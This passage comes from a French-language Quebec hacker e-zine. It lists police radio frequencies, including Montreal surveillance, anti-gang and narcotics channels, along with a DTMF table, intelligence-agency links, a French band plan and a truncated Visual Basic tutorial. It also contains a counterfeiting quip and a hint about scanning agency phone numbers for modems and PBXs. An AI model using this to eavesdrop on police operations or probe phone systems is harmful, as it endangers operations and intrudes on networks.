TRK SHERBROOKE SIMPLEX. 856.03750 XJF 44 TRK SHERBROOKE SIMPLEX. 856.28750 XJF 44 TRK SHERBROOKE SIMPLEX. 856.53750 XJF 44 TRK SHERBROOKE SIMPLEX. 856.78750 XJF 44 TRK SHERBROOKE SIMPLEX. 855.56250 XJF 44 TRK SHERBROOKE SIMPLEX. SWAT 867.26250 XJF 44 TRK SHERBROOKE TRUNKING EDACS 866.26250 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.23750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.48750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.53750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.76250 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.78750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 867.03750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 867.06250 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 867.28750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. 866.73750 XJF 44 TRK SHERBROOKE TRUNKING EDACS. ALLOUE MAIS PAS EN SRV ? 155.97000 XJG 57 SILLERY VERIFIE INFO MEDAQ 411.93750 XJH 30 103.5 SOREL 413.43750 XJH 30 100.0 SOREL 154.17500 XJI 284 ST ADOLPHE D'HOWARD 154.20500 XJI 284 103.5 ST ADOLPHE D'HOWARD ENCODAGE SSI ET ACI RX (800 HZ) 411.58750 XJO 883 71.9 ST AMABLE POLICE DE STE JULIE 154.16000 XJG 461 100.0 ST AMBROISE DE KILDARE POSTE DE POLICE DE JOLIETTE 151.29500 XJF 771 100.0 ST ANTOINE DES LAURENTIDES 411.61250 XJF 945 100.0 ST BASILE LE GRAND CW ID RX.SSI 412.26250 XJK 937 114.8 ST BRUNO DE MONTARVILLE ENCODAGE SSI (VSB) PERMANENT 411.67500 XJJ 671 100.0 ST CESAIRE (VILLE) 154.16000 XJG 461 100.0 ST CHARLES BOROMEE POLICE JOLIETTE (450) 759-5222 154.92000 VBN 344* ST CHARLES BORROMEE VOIR 154.160 POLICE JOLIETTE 411.68750 XJL 635 123.0 ST CONSTANT 412.56250 XJG 425 156.7 ST CONSTANT CANDIAC, DELSON, ST CONSTANT 151.29500 XJF 895 127.3 ST DONAT (MONTCALM) REPETEUR AU MT GARCEAU.AVEC INCENDIES ?. 413.13750 XJG 494 123.0 ST EUSTACHE 413.56250 XJN 667 123.0 ST EUSTACHE 413.68750 XJN 667 123.0 ST EUSTACHE 411.93750 XJN 667 123.0 ST EUSTACHE ENCODAGE SSI PERMANENT 454.37500 [REF] 136.5 ST EUSTACHE TEMPORAIRE. SERVAIT LORS DE LA CRISE OKA 154.65000 XJI 83 ST FELICIEN 411.60000 XJF 291 114.8 ST GABRIEL (BERTHIER) 154.92000 XJF 877 ST GEORGES DE BEAUCE 158.97000 XJF 875 ST GEORGES OUEST 411.16250 XJF 264 123.0 ST HUBERT/LEMOYNE F1 412.78750 XJF 264 123.0 ST HUBERT/LEMOYNE F2 - CRPQ 413.13750 XJF 264 123.0 ST HUBERT/LEMOYNE 412.18750 XJF 73 100.0 ST HYACINTHE BASE = CONTROLE 411.98750 XJF 49 110.9 ST JEAN SUR RICHELIEU F2 - POLICE DU HAUT RICHELIEU 412.96250 XJF 49 110.9 ST JEAN SUR RICHELIEU F1 411.38750 XJF 37 118.8 ST JEROME 151.29500 XJF 37 100.0 ST JEROME A REVOIR 154.02500 XJF 293 ST JOVITE 411.38750 XJF 51 123.0 ST LAMBERT TIM (PAS DE CTCSS) +VOIX (AVEC CTCSS) 410.56250 XJA 260 114.8 ST LAZARE DANS TOUR D'UNITEL 412.66250 VOR 492 ST LAZARE DANS TOUR D'UNITEL 411.65000 VOR 492 114.8 ST LAZARE SECURITE POLICE (TOUR UNITEL) 158.97000 ? ST LUC DE CHAMPLAIN 410.86250 XJP 397 162.2 ST LUC SUR RICHELIEU 413.36250 ? ST MICHEL 154.16000 XJG 461 100.0 ST PAUL DE JOLIETTE POLICE JOLIETTE 154.16000 XJG 461 100.0 ST PIERRE DE JOLIETTE (VIL) POLICE JOLIETTE 410.11250 ? ST RAYMOND 411.71250 XJH 256 114.8 ST REMI DE NAPIERVILLE SSI 410.16250 XJF 721 91.5 ST SAUVEUR DES MONTS 159.21000 XJF 80 100.0 ST THIMOTHE AUTRE RPT A 151.265 (PARALLELE) 151.26500 ? 100.0 ST THIMOTHE NEW JUIL 99 EN // AVEC 159.210 RPT # 2 154.16000 XJG 461 100.0 ST THOMAS DE JOLIETTE POLICE JOLIETTE 413.92500 XJF 814 ST TITE 162.12000 ? 100.0 STE ADELE 159.21000 XJG 35 103.5 STE AGATHE DES MONTS 154.83000 CFD 693 100.0 STE ANNE DES LACS NOUVEAU JAN 1997. 3 MUNICIPALITES.ANI 411.88750 ? STE ANNE DES PLAINES 413.31250 XJF 556 114.8 STE CATHERINE 411.03750 XJF 556 114.8 STE CATHERINE ENCODAGE SSI 410.13750 XJG 91 162.2 STE FOY F-1 OPERATIONS (VERIFIE PAR INFO-MEDAQ). CHANGE EDACS 866 MHZ 411.11250 XJG 91* 162.2 STE FOY F-2 BROUILLEUR NON PERMANENT (INFO MEDAQ PASSE SUR EDACS 866 MHZ + AEGIS ) 413.31250 XJG 91 162.2 STE FOY F-3 SIMPLEX - PASSE AU EDACS + AEGIS NUMÉRIQUE 866.11250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM. 866.21250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM. 867.41250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM. 866.46250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM. 866.66250 XJG 91 TRK STE FOY TRUNKING EDACS + ENCODAGE NUMÉRIQUE AEGIS PERM. 411.58750 XJO 883 71.9 STE JULIE DE VERCHERES 154.26500 XJG 432 STE MARIE DE BEAUCE 411.68750 XJF 506 STE MARTHE SUR LE LAC 154.16000 XJG 461 100.0 STE MELANIE POLICE JOLIETTE 411.63750 XJF 330* STE SOPHIE (TERREBONNE) 154.130. 154.13000 XJF 330 114.8 STE SOPHIE (TERREBONNE) SSI 412.88750 XJF 74 127.3 STE THERESE 156.03000 ? SUFFOLK COUNTY NY. CAR TO CAR. 411.65000 XJF 243 SUTTON 410.86250 VOR 472 141.3 TERREBONNE 411.48750 XJF 342 141.3 TERREBONNE 411.88750 XJF 570 141.3 TERREBONNE 419.12500 ? TERREBONNE LIENS VERS REPETEURS 412 MHZ 414.13750 ? TERREBONNE (REMOTE) LIENS VERS REPETEURS 412 MHZ.TX TOUJOURS ON. 412.97500 ? THETFORD MINES 154.92000 XJF 943 THURSO 142.33500 ? 127.3 TORONTO ? RECU EN INVERSIONS (DE TEMPÉRATURE) 411.71250 XJF 499 100.0 TRACY 411.93750 XJF 499 103.5 TRACY 413.01250 XJF 499 100.0 TRACY 151.29500 XJF 499 123.0 TRACY REPETEUR MOBILE VERS 411/416.7125 410.30000 XJF 410 TROIS RIVIERES 410.67500 XJG 29 77.0 TROIS RIVIERES RX SOUVENT EN INVERSIONS 411.62500 ? 82.5 TROIS RIVIERES OUEST 460.20000 KTB 231 118.8 TROY, VERMONT 460.15000 KTB 231 118.8 TROY, VERMONT ID RX VOCALEMENT. QTH A REVOIR 411.68750 XJF 767 VAL BELAIR 412.48750 XJF 767 VAL BELAIR 411.13750 ? VAL BELAIR ENCODAGE (?) PERMANENT.DE INFO-MEDAQ. 411.57500 ? VAL D'OR 151.29500 XJF 895 VAL DAVID ST DONAT 410.86250 ? 114.8 VALCOURT 159.21000 XJF 80 100.0 VALLEYFIELD AUTRE RPT A 151.265 (PARALLELE) 151.26500 ? 100.0 VALLEYFIELD NEW JUIL 99 EN // AVEC 159.210 RPT # 2 **412.01250**XJK 37*****156.7**VANIER PLUS EN FONCTION - COUVERT PAR QUÉBEC **413.38750**XJK 37*****156.7**VANIER PLUS EN FONCTION - COUVERT PAR QUÉBEC 412.11250 XJG 47 123.0 VARENNES AUSSI TERMINAUX (0 PL).MAINTENANT ENCODE SSI. 411.65000 ? 103.5 VAUDREUIL 412.31250 XJF 826 107.2 VAUDREUIL 411.71250 XJF 826 107.2 VAUDREUIL-DORION 412.66250 ? 118.8 VICTORIAVILLE 164.10000 VAS 788* WASKAGANISH 411.62500 XJF 457 100.0 WATERLOO ENCODAGE SSI 411.57500 XJH 240 WINDSOR 460.03750 KSE 566 118.8 [?] [USA] REVOIR ID, PAS BON (QTH:TEXAS) 155.46000 XJG 429 141.3 [NON LOCALISE] 410.76250 ? 71.9 [NON LOCALISE] 411.38750 ? 114.8 [NON LOCALISE] 411.67500 ? 103.5 [NON LOCALISE] 411.71250 ? 110.9 [NON LOCALISE] 411.73750 ? 110.9 [NON LOCALISE] 412.21250 ? 141.3 [NON LOCALISE] 412.23750 ? 141.3 [NON LOCALISE] 412.26250 ? 123.0 [NON LOCALISE] 413.51250 ? 141.3 [NON LOCALISE] 411.98750 ? [NON LOCALISE] BURSTS DE DATA TERMINAUX MOBILES. 154.92000 ? 103.5 [NON LOCALISE] ENCODAGE SSI ET PP NR 155.62500 ? [NON LOCALISE] ENCODAGE SSI RPT OUT 0 PL 412.38750 ? 141.3 [NON LOCALISE] REVOIR CTCSS,PAS CERTAIN 413.46250 ? [NON LOCALISE] TIM - STE JULIE ? NOTES : Lorsque je mentionne à quelques reprises 'Entendu ou RX en inversions' cela indique que j'ai reçu cette station en inversions....de température (lorsqu'un front froid rencontre un chaud ou vice-versa. Cettecondition est favorable pour faire voyager les ondes VHF et UHF sur de grandes distances et peut durer de quelques minutes à plusieurs heures.) et ne s'applique pas au genre de modulation. SI un encodage de la voix est utilisé, j'utilise plutôt la mention 'SSI' ou 'encodage SSI'.... **************************************************************************** Fréquences de la SQ Voici une liste de fréquences connues utilisé par ce service. Classification par fréquences NOTE : Pour ce tableau, j'inclus quelques localisations à titre de référence seulement, mais cela n'est pas complet car bien entendu ces fréquences sont utilisées un peu partout au Québec...du moins pour les canaux 1 à 11. RPT Mobiles Canal Notes et détails N/A 171.075 C Mobiles à mobiles seulement (mobiles du G.I. seulement) N/A 171.180 A Mobiles à mobiles seulement N/A 172.020 B Mobiles à mobiles seulement 152.510 157.770 16 152.525 157.785 17 152.540 157.800 18 152.555 157.815 19 153.650 155.100 22 Poste autoroutier Montréal-Laval [M] (Montréal-Métro). 153.920 155.040 25 154.100 154.430 27 154.220 155.520 20 154.400 154.565 154.680 155.580 21 MRC Matawinie (Rawdon) [Q] 154.740 155.850 23 Poste autoroutier Montréal-Laval (Montréal-Métro) 154.800 155.400 26 MRC Des Pays D'en Haut 154.950 155.970 24 155.655 166.500 171.540 03 166.620 171.810 07 Était cartier général 166.635 171.795 12 166.650 171.780 10 Cartier / Champlain (ponts) 166.665 171.195 15 166.680 171.210 06 166.740 172.140 02 166.800 171.360 01 Poste principal MRC Matawinie (Rawdon) 166.815 171.495 13 MRC Montcalm [Q] (ex. poste Lachenaie) 166.830 172.080 08 Poste autoroutier des Laurentides [M] / MRC Des Pays D'en Haut [M] /Anciennement : Cowansville/Granby [S], St Jérôme [H]. 167.010 172.200 09 Poste principal MRC Matawinie 167.025 171.525 14 MRC de Lanaudière (Berthier et autoroutes) 167.040 171.930 05 Poste principal MRC Matwawinie 167.340 171.480 04 Anciennement : Valleyfield/Vaudreuil [K], autre [Q] 167.535 167.550 167.700 171.510 11 454.475 459.475 R1 Répéteur véhiculaire, basse puissance 454.550 459.550 R2 Répéteur véhiculaire, basse puissance 454.625 459.625 R3 Répéteur véhiculaire, basse puissance Fréquence de la SQ Classification par CANAUX Répéteur Mobiles Canal 166.800 171.360 01 166.740 172.140 02 166.500 171.540 03 167.340 171.480 04 167.040 171.930 05 166.680 171.210 06 166.620 171.810 07 166.830 172.080 08 167.010 172.200 09 166.650 171.780 10 167.700 171.510 11 166.635 171.795 12 166.815 171.495 13 167.025 171.525 14 166.665 171.195 15 152.510 157.770 16 152.525 157.785 17 152.540 157.800 18 152.555 157.815 19 154.220 155.520 20 154.680 155.580 21 153.650 155.100 22 154.740 155.850 23 154.950 155.970 24 153.920 155.040 25 154.800 155.400 26 154.100 154.430 27 171.075 171.075 28 / C N/A 171.180 A N/A 172.020 B N/A 171.075 C 454.475 459.475 R1 454.550 459.550 R2 454.625 459.625 R3 ***************************************************************************** Fréquences radio du SPCUM A noter que les canaux sont répertoriés et numérotés en 6 banques : 1 - Canaux d'usage général 2 - Sections spécialisées 3 - Groupe technique 4 - Surveillance D - Données (les canaux de data) R - Canaux de réserve 1-01 = 410.1125 1-02 = 410.2625 (auxiliaire) 1-03 = 410.3625 1-04 = 410.4875 1-05 = 410.6125 1-06 = 410.7875 (auxiliaire) 1-07 = 410.9125 1-08 = 410.6625 (utilisée en simplex pour les suivis de personnes) 1-09 = 412.6875 (opérations spéciales) 1-10 = 411.3125 (opérations spéciales) 1-11 = 412.1375 (opérations spéciales) 1-12 = 410.0125 (opérations spéciales - lien téléphonique) 2-01 = 408.3125 Simplex - section d'intervention régionale (OUEST) 2-02 = 408.6375 " " " " " + hélico.(CENTRE SUD/EST) 2-03 = 408.4125 Simplex - section d'intervention régionale (NORD/EST) 2-04 = 408.2125 Simplex - Moralité 2-05 = 408.5125 Simplex - Vols qualifiés 2-06 = 408.4375 Simplex - Fraudes et incendies criminels 2-07 = 408.5375 Simplex - Anti gang 2-08 = 408.1125 Simplex - Stupéfiants A noter que ces canaux, de la banque 2, sont généralement encryptés en mode numérique. ..et qu'il est impossible de les décoder. Si votre radio s'arrête sur l'une de ces fréquences et que vous entendez que du bruit blanc (comme si le squelch etait ouvert) c'est qu'il s'agit d'une transmission encodée numériquement. 3-01 = 413.6625 (Groupe technique/tactique) 3-02 = 413.6125 (Groupe technique) Ces fréquences sont aussi encodées numériquement la plupart du temps. 4-01 = 411.1875 Centre opérationnel (Brouillé,répéteur n'est pas utilisé présentement) 4-02 = 418.2125 Surveillance physique (Brouillé, simplex) 4-03 = 411.5375 Groupe tactique (sert rarement) 4-04 = 418.7375 Surveillance physique (Brouillé, simplex) 4-05 = 418.7875 Surveillance physique (Brouillé, simplex) 4-06 = 418.1875 Surveillance physique (Brouillé, simplex) 4-07 = 418.2375 Surveillance physique (Brouillé, simplex) De nouveau, la plupart de ces fréquences sont encodées numériquement. D-1 = 410.0375 D-2 = 410.3375 D-3 = 410.8125 D-4 = 411.2125 Transmission de données pour les terminaux mobiles. Le standard n'est pas connu de même qu'il est impossible a décoder... Réserve R-01 = 418.8625 R-02 = 410.5875 R-03 = 413.7375 R-04 = 413.7625 (véhicules volés) R-05 = 418.1125 R-06 = 413.7875 R-07 = 413.2375 Divers : Centre des mesures d'urgences de la CUM 411.2375 Plusieurs intervenants participent à ce service, dont la ville de Montréal et les municipalités environnantes, ainsi que d'autre intervenants dont Urgences Santé, la Sûreté du Québec, la STCUM, la police des ports nationaux,etc,etc. Une vérification du système radio se fait tout les mardis matin. **************************************************************************** Fréquences des tonalités de signalisation DTMF ( DTMF - Dual Tone Multi Frequencies ) TOUCHE F1 (Hz) F2 (Hz) 1 1209 697 2 1336 697 3 1477 697 4 1209 770 5 1336 770 6 1477 770 7 1209 852 8 1336 852 9 1477 852 0 1336 941 * 1209 941 # 1477 941 A 1633 697 B 1633 770 C 1633 852 D 1633 941 DIAL TONE 350 440 BUSY SIGNAL 480 620 RINGING SIGNAL 440 480 **************************************************************************** -- A venir? -- - Plan pour filtre interférence/intermodulation - Plan de modification de tone - Encore du stock de police et agence secrète :) - Satellite - D'Autre sorte d'antenne - D'Autre ondes, juste pour vous... - Interresting Web Site - Découverte! - Trucs Divers - Vos question...? - Et plus... Greeting to: "Neuro" Pour l'article qu'il a trouver de VE2VGA et "VE2VGA" ...pour tout ce que j'ai pu trouver sur son site et mes Aussi mes livre: Haruteq Scanner Book Édition Québec et L'annuaires de fréquence de la région de Québec! Oh et la revue Net-Mag avec leur fréquence secrète qui viennent de VE2VGA que je n'aurais pu connaître sans eu :) -- Conclu! -- Bon alors vous avez du voir que mon article est environ le quart de ce que Neuro a trouver mais ca dérange pas l'intention etais la hehe! Non sans joke la prochaine fois je vais vous donnez un ou deux plan assurer car je crois que l'article etais assez gros et que de toute façon j'ai pas eu le temps de faire le .jpg du plan alors cela est remis a la prochaine fois. Alors j'espère que vous avez aimer et que vous allez m'envoyer vos questions et vos découverte pour les prochains mag... -====================- -= Services Secrets =- -====================- Bon ca y est les services secret sur Internet... Mouais ceci est tirer de la revue "Net-Mag" que j'avais perdu ouais! Bon eu y dise que c'est pas aussi secret que ca les services secret mais tk je commencerai pas a trop dire mais opinion malgré que vous devez comprendre que c'est pas dans le plus top secret ce qui est le plus secret n'est pas vraiment connecter au net malgré qu'un français ou un belge je sais pu a trouver une liste de militaire et entk le gros kit sur un site mais finalement on en sais trop rien! Va falloir vérifier! -- Les services secrets anglais -- http://www.mi5.gov.uk Il existe au moins deux sites sur les Services Secrets anglais. L'un est le site officiel de MI5 (Services de Sécurité). La plupart des documents sont au format PDF et nécessitent Acrobat Reader, d'Adobe. Il est très facile de contacterdirectement par téléphone au: (0)171 930 9000 l'indicatif est le: (011 44) si vous avez des informations sur des terroristes, par exemple. L'autre site (non officiel) concerne le MI6: http://www.five.org.uk/security/mi6org/mi6org.htm Le MI6 est le "Secret Intelligence Service" Anglais (les espions) dont le directeur actuel est: David Spedding depuis septembre 1994. -- Les services secrets US -- http://www.treas.gov/usss Le site officiel des Services Secrets des États-Unis (en anglais) donne beaucoup d'informations. Allez voir la galerie de photos. On y apprend comment détecter la fausse monnaie, grâce a de nombreuse photos détaillées des billets vert ... Alors avec ca vous allez pouvoir savoir quoi ne pas faire si vous faite de la fausse monnaie des US. http://www.treas.gov/usss/money_detect.htm On y trouve aussi des offres d'emploi (pour citoyens américains "filiales" dans chaque état et a l'étranger, l'histoire des services secrets et leur directeur actuel: Brain L Stafford http://www.treas.gov/usss/director.htm . Voir aussi le site de la CIA Central Intelligence Agency dirigée par George J. Tenet: http://www.cia.gov et celui NSA: http://www.nsa.gov:8080 -- Les services secrets israéliens -- http://www.chez.com/boigien/secret/israel/mossad/mossad.htm (site non officiel bien sur) On distingue l'Aman: Agaf Ha-Modi'in pour les renseignent militaire: le Lekem Lishkat Késhér Madaï qui est le bureau des relations scientifiques: le MossadHa-Mossad Lé-Mofiin ou lé Tafkidim Méyouh'adim c'est l'institut de renseignement et des opération spéciales (les espions) et dont le patron actuel est le Général Danny Yatom remplaçant Shabtaï Shavit; le Shin Beth: Shérout Ha-Bitah'on Ha-Klali qui est le service de la sécurité générale. -- Les services secrets français -- La aussi, il en existe plusieur: ceux qui dépendent secrétariat général de la défense nationale comme la BRGE, Brigade de Renseignement et de Guerre Électronique ; la DGSE Direction Générale de la Sécurité Extérieur (les espions) ex-SDECE, dont le directeur actuel est Jacques Dewatre ; la DPSD, Direction de la Protection et de la Sécurité de la Défense; la DRM, Direction du Renseignement Militaire et le SCSSI, Service Central de la Sécurité des Systèmes d'Information. Et ceux qui dépendent du ministère de l'intérieur: la DST Direction de la Surveillance du Territoire et les RG, Direction centrale Renseignement Generaux.Et ici le site non officiel de la DGSE. http://dsge.citeweb.net/principale.shtml Il y a des résumes de quelques opérations(Rainbox warrior, "remplacement" de Bokassa par Dacko et quelque autres sabotages), les principaux sites: la "piscine" (caserne Mortier) "tristus-city",etc... -- Les services secrets canadiens -- http://www.csis-scrs.gc.ca Beaucoup de communication dans ce site du Service canadien du renseignement de sécurité (SCIS). On y trouve les adresses de leurs bureaux. Le directeur actuel du SCIS est Ward Elcock. Vous pouvez lire son communiquer: http://www.csis-scrs.gc.ca/fra/press/kellyf.html . A voir aussi la GRC: http://www.spots.ab.ca/~fivestar/grc2.htm et pour la liste des fréquences secretes veiller vous referez a l'article de Scanner D'ondes. Bon alors peut-être que certain cherchais certaine de ces adresses entk vous pourrez y faire ce que vous y voulez avec sans trop de connerie bien sur comme on le sais tous :) Et je crois bien qu'il doit y avoir de bonne information dans quelques un de ces sites ou sinon en scannant un peu on devrais trouver mieux et en plus il y a des sites qui donnent les numéro de téléphone alors on peut très bien trouver des VMB, Modem, PaBX ,etc... alors chercher un peu et si j'ai le temps ma essayer de faire ca pour vous un moment donner! Alors pas trop de connerie PaToFF(Pat-EtHiQ) ********************************************************************** 8-1 QUELQUES FREQUENCES D'ECOUTES (+ ou - légales) by Cyberdollar ********************************************************************** 26,065 à 26,505 MHz CB (bande "A") 26,313 à 26,475 MHz téléphones sans fil agréés 26,515 à 26,955 MHz CB (bande "B") 26,965 à 27.405 MHz CB (bande "C", seule autorisée en France) 27,415 à 27,855 MHz CB (bande "D") 27,865 à 27,985 MHz CB (bande "E") 28,000 à 29,700 MHz trafic amateur (bande des "10 mètres") 29,700 à 30,525 MHz usage militaire 30.525 à 32.125 MHz réseaux privés 32.125 à 32.500 MHz usage militaire 33.000 à 34.850 MHz usage militaire 34.850 à 36.200 MHz réseaux privés 35.400 à 39.200 MHZ microphone "sans fil" 36.200 0 39.000 MHz usage militaire 37.500 à 38.250 MHz radio-astronomie 39.400 à 40.600 MHz réseaux privés 40.600 à 41.000 MHz usage militaire 41.000 à 41.200 MHz radiocommande 41.255 MHz télécommande 41.312 à 41.475 MHz téléphones sans fils agréés 41.500 à 50.200 MHz usage militaire et téléphone sans fil non agréés 50.200 à 51.200 MHz trafic amateur 51.200 à 60.000 MHz usage militaire 55.750 à 63.750 MHz télévision (bande I) 60.000 à 68.000 MHz réseaux privés 68.000 à 68.460 MHz usage militaire 68.462 à 69.250 MHz réseaux privés, douanes 69.250 à 70.250 MHz usage militaire 70.250 à 70.525 MHz réseaux militaire 70.525 à 70.975 MHz usage militaire 70.975 à 71.950 MHz réseaux privés 71.950 à 72.500 MHz usage militaire, EDF 72.512 à 73.300 MHz réseaux privés, douanes 73.300 à 74.800 MHz Gendarmerie Nationale 74.800 à 75.200 MHz radiolocalisation aéronautique 75.300 à 77.475 MHz réseaux privés, taxis 77.475 à 80.000 MHz Gendarmerie Nationale 80.000 à 82.475 MHz réseaux privés, taxis 82.475 à 83.000 MHz usage militaire 83.000 à 87.300 MHz police, pompiers, SAMU 87.340 à 87.415 MHz système Eurosignal 87.500 à 108.000 MHz radiodiffusion FM (bande II) 108.800 à 112.00 MHz balisage aéronautique (ILS) 108..000 à 118.000 MHz usage militaire 111.600 à 177.900 MHz balise aéronautique (VOR) 118.000 à 136.000 MHz trafic aéronautique (bande "air" ou "aviation") 136.000 à 138.000 MHz satellites 138.000 à 144.000 MHz usage militaire 143.9875 à 144.000 MHz fréquence réservée "vol libre" 144.000 à,146.000 MHz trafic amateur (bande des "2 mètres") 146.000 à 156.000 MHz trafic aéronautique 151.000 à 151.425 MHz réseaux "R 150" 151.425 à 152.380 MHZ réseaux privés 152.880 à 152.975 MHz réseaux "R 150" 152.975 à 156.025 MHz trafic maritime et fluvial (bande "VHF marine") 156.025 à 157.425 MHz trafic maritime et fluvial (bande "VHF marine") 157.425 à 157.575 MHz réseaux privés 157.575 à 160.200 MHz réseaux "R 150" 160.200 à 160.625 MHz réseaux privés 160.625 à 160.950 MHz trafic maritime et fluvial (bande "VHF marine") 160.975 à 161.475 MHz réseaux privés 161.550 à 162.025 MHz trafic maritime et fluvial (bande "VHF marine") 162.500 à 162.525 MHz trafic maritime et fluvial (bande "VHF marine") 165.200 à 168.900 MHz téléphone de voiture Radiocom 2000 169.800 à 173.500 MHz téléphone de voiture Radiocom 2000 176.500 à 183.500 MHz téléphone de voiture Radiocom 2000 184.500 à 189.100 MHz téléphone de voiture Radiocom 2000 192.500 à 197.100 MHz téléphone de voiture Radiocom 2000 197.700 à 199.500 MHz téléphone de voiture Radiocom 2000 200.500 à 207.500 MHz téléphone de voiture Radiocom 2000 208.500 à 215.500 MHz téléphone de voiture Radiocom 2000 216.500 à 223.500 MHz téléphone de voiture Radiocom 2000 225.000 à 400.000 MHz trafic aéronautique et usage militaire 406.100 à 410.000 MHz réseaux privés 414.500 à 418.000 MHz téléphone de voiture Radiocom 2000 418.000 à 420.000 MHz réseaux privés 424.500 à 428.000 MHz téléphone de voiture Radiocom 2000 430.000 à 440.000 MHz trafic amateur (bande "432") 440.000 à 444.600 MHz téléphone de voiture ligne SFR 444.600 à 447.000 MHz réseaux privés 450.000 à 454.600 MHz téléphone de voiture ligne SFR 454.600 à 456.000 MHz police, pompiers, SAMU 456.000 à 457.675 MHz réseaux privés 457.675 à 458.225 MHz SNCF 463.000 à 464.000 MHz réseaux privés 464.000 à 466.000 MHz police, pompiers, SAMU 466.000 à 467.675 MHz réseaux privés 467.675 à 468.225 MHz SNCF 468.325 à 470.000 MHz réseaux privés 470.000 à 606.000 MHz télévision (bande IV) 614.000 à 880.000 MHz télévision (bande V) 884.000 à 890.000 MHz téléphone sans cordons 890.000 à 915.000 MHz téléphone de voiture GSM 929.000 à 935.000 MHz téléphone sans cordon 935.000 à 960.000 MHz téléphone de voiture GSM 960.000 à 1215.000 MHz aéronautique: IFF, TACAN, DME 1240.000 à 1300.000 MHz trafic amateur ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 9-Vb5 Tutorial.. |( ) Phreak ( ) Hack (X) Autres '._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___ Bon alors, cet arcticle est le premier d'une suite portant sur Microsoft Visual Basic version 5.0. Ne vous attendez pas a avoir des sources miracle pour créé un tetris ou un IRC client. Mais, pour ce premier numéro, plutôt une introduction du logiciel et de son Fonctionnement en général. Bien entendu, cette suite d'arcticle s'adresse au débutant, mais qui sait, peut-être n'en savez-vous pas autant que vous le croyez, Le Basic: Le basic est le langage utilisé en Visual Basic, on pense tout de suite au Basic lorsqu'on entend "Q-Basic", un logiciel de programmation en DOS qui ressemble particulièrement à "edit.com" Microsoft a repris Qbasic et en a fait une version plus visual donc plus "frendly" en utilisant le mode de Programmation par Object. VB5? La Raison pour laquelle j'ai opté pour la version 5 de Visual Basic, c'est parceque la majorité des personnes utilisent Vb5 ou savent où se le procuré. Description de l'interface ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Barre de Menu: Elle Comprend tout les Commandes disponible de Visual Basic. Ce n'est pas la plus rapide, mais on fini tjr par y trouver ce que l'on cherche. Barre de Bouton: Elle comprend les commandes les plus courante: ¤ Enregistrer ¤ Ouvrir ¤ Ajouter une Feuille ¤ Executer ¤ Stop Barre de Controle: C'est ici que trouve tout les controles qui sont à votre disposition, il vous suffit de cliquer sur le controle désiré puis allé faire une séleciton sur la feuille de travail. Vous pouvez également doublecliquer dessus. sa en metera un au centre de la feuille. Feuille de Travail: C'est ici que l'on consoit le programme, les programmes peuvent être composé d'une ou plusieur feuille. Fenêtre de Propriété: (F4) C'est ici que s'affiche les propriétés des objects sélectionnés. Voici la définition des propriétés le splus souvant rencontré: Name: Le nom de l'objet, chaque objet doit avoir un nom qui lui est propre. c'Est avec celui-ci qu'on l'identifie. Caption & Text: Le caption contien le texte que l'objet affichera. Le caption ne peut être modifier à l'aide du clavier lors de l'éxécu du programme, contrairement au text ToP: Cette valeur représente l'équart entre le haut de l'object et sa limite supérieur (par raport a ce dans quoi il se situe). Ex: un bouton dans une feuille, une feuille dans l'écrant, un label dans un picturbox. Left: Cette valeur représente l'équart entre le coté gauche l'object et sa limite de de gauche. Height: Cette Valeur représente la largeur vertical de l'objet weight: Cette valeur représente la largeur horizontale de l'objet Le Codage: (F7) Pour entré du codage, vous devez double cliquer sur l'objet en question. ________ Notions: (End) ¯¯¯¯¯¯¯¯ La fonction END sert a terminer le programme. ____________ Exercice 1.1 (Fonction End) ¯¯¯¯¯¯¯¯¯¯¯¯ Nous Allons Maintenant réaliser notre premier programme: - Ouvrez un nouveau projet Visual Basic - Insérez un bouton sur la feuille - Double-Cliquez sur le bouton pour en affiché le codage (F7) - Vous verrez le codage suivant: Private Sub Command1_Click() End Sub - Entre les 2 lignes, insérez la fonction END, comme ceci: Private Sub Command1_Click() End End Sub - Maintenant, fermez la fenêtre de codage et appuyez sur Play (F5). Voici votre premier programme en Visual Basic. Si vous cliquez sur le bouton , le programme se terminera, c'est l'utilité de la fonction END. ________ Notions: (Propriétés) ¯¯¯¯¯¯¯¯ Lorsqu'on change une propriétée d'un objet avec du codage, on doit toujour conserver la syntaxe suivante: [Feuille.]objet.pripriété = Nouvelle Valeur ____________ Exercice 1.2 (Propriétés, textes et Caption) ¯¯¯¯¯¯¯¯¯¯¯¯ - Ouvrez un nouveau projet Visual Basic - Cette vois, disposez y les objets suivant comme le présente l'image exercice1_2.jpg : Boutons: Name: Caption: ¯¯¯¯¯ ¯¯¯¯¯¯¯¯ Bo_Quit Quitter Bo_Raz RAZ Bo_Copy Copy Ettiquettes: Names: Caption: ¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ Et_Destination 'Rien' Zone de Texte: Names: Text: ¯¯¯¯¯¯ ¯¯¯¯¯ Zt_Enter 'Rien' - Entrez, dans le bouton approprié, le codage suivant: Private Sub Bo_Copy_Click() Et_Destination.Caption = Zt_Enter.Text End Sub Private Sub Bo_Raz_Click() Et_Destination.Caption = "" Zt_Enter.Text = "" End Sub Private Sub Bo_Quit_Click() End End Sub Executez le programme, vous remarquerez que le bouton RAZ efface tout, il prend les opripriétés caption et text de l'étiquette et de la Zone de Texte et leur donne les valeur "" (aucune, null) donc, rien. Le bouton Copy lui, prend le texte que vous avez saisit dans la Zone de Texte, et l'affiche dans l'étiquette. Il prend la valeur de la pripriétés Text du Zt_Enter et l'applique à la propriété Caption de Et_Destination. Le bouton Quitter 